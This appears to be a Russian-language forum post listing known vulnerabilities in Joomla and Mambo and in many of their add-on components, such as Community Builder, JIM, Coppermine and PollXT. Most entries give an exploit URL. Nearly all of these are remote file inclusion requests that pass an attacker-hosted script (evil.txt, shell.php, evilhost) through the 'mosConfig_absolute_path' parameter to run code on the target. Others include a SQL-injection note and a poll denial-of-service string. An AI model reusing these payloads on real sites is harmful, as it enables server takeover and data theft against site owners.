URL производителя Mambo CMS :
www.mamboserver.com URL производителя Joomla CMS :
www.joomla.org Что почитать :
http://ru-mambo.ru/index.php?option=...egory&id= 123
http://joom.ru/
http://myjoomla.ru JOOMLA & MAMBO Joomla : < 1.0.4 Недостаточно фильтруются данные в параметре "Itemid" в модуле "mod_poll" и в других методах в классе "mosDBTable".
Joomla : 1.0.5 Уязвимость существует из-за того, что программное обеспечение позволяет злоумышленнику получить доступ к vCard других пользователей с помощью специально сформированного URL.
Joomla : 1.0.10 ; 4.5.4 и 4.6 RC2 ( Mambo ) Уязвимость существует из-за недостаточной фильтрации входящего параметра "id" и позволяет выполнять произвольный SQL запросы.
Примечание : Для удачной эксплуатации уязвимости злоумышленник должен иметь привилегии редактора.
Joomla : 1.0.7 Уязвимость существует при обработке входных данных в сценарии includes/feedcreator.class.php.
Эксплоит : index.php?option=com_rss&feed=filename_here&no_htm l=1 Уязвимость существует при обработке входных данных в сценарии includes/phpInputFilter/class.inputfilter.php.
Эксплоит :index.php?option=com_poll&task=results&id=14&mosm sg=DOS@HERE<<>AAA<><> Joomla : 1.0.9 Уязвимость существует из-за недостаточной обработки входных данных в параметре "Name".
Mambo : 3.0 Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_mambatstaff/mambatstaff.php
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Mambo : 4.5.2.3 Уязвимость существует из-за ошибки в уровне эмуляции "register_globals" в сценарии "globals.php".
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
УЯЗВИМОСТИ В МОДАХ-НАДСТРОЙКАХ ДЛЯ JOOMLA CMS Community Builder 1.0 RC 2 и 1.0 Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_comprofiler/plugin.class.php
Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
JIM : 1.0.1 Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'install.jim.php'
Эксплоит :
http://victim/[path]/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://evil_script? Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Coppermine 1.0 Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'cpg.php'
Эксплоит :
http://victim/components/com_cpg/cpg...absolute_path= Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Webring 1.0 Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'admin.webring.docs.php'
Эксплоит :
http://victim/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts? Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
JD-Wiki < 1.0.3 Уязвимость возможна из-за отсутствующей фильтрации передаваемых параметров в скрипте 'main.php'
Эксплоит : /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Security Images 3.0.5 Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path"
Эксплоит :
http://victim/components/com_securit...tp://shell.txt Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Colophon 1.2 Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_colophon/admin.colophon.php.
Эксплоит :htttp:/victim/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php? Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
Mambo-SMF Forum 1.3.1.3 Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_smf/smf.php.
Эксплоит :
http://[site]/[joomla or mambo path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[evil scripts] Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
PollXT 1.22.07 Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_pollxt/conf.pollxt.php.
Эксплоит :
http://victim/components/com_pollxt/...ttp://evilhost Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
perForms 1.0 Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии performs.php.
Эксплоит :
http://www.vuln.com/components/com_p...ttp://evilhost Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
com_hashcash 1.2.1 Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_hashcash/server.php.
Эксплоит :
http://[target]/[path]/components/com_hashcash/server.php? mosConfig_absolute_path=http://attacker.com/evil.txt? Примечание : Для удачной эксплуатации уязвимоста на удаленном сервере опция "register_globals" должна быть включена
PccookBook 1.3.1 Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_pccookbook/pccookbook.php.
Эксплоит :
http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://attacker.com/evil.txt?